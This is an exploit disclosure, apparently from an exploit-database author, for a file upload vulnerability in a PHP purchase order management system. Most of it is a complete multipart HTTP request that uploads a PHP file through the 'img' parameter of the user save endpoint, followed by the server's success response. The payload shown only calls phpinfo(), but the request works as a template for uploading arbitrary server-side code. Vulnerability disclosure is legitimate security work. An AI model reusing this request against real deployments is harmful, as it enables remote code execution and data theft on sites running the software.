## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit
## Author: nu11secur1ty
## Date: 11/08/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The `img` parameter is vulnerable to File Upload vulnerability. This will make it easy for malicious for the already login users to this system
to getting sensitive information, or even worse than ever, they can destroy it very easily!
STATUS: HIGH- Vulnerability
[+]Exploit:
```
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 709
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="id"
1
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="firstname"
Adminstrator
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="lastname"
Admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryoIjZa6BqBYZRIp8V--
```
[+]Response:
```
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:52:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
1
```
## Reproduce:
[href](https://www.youtube.com/watch?v=XODY8SSz62c)
## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html)
## Time spent:
00:05:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>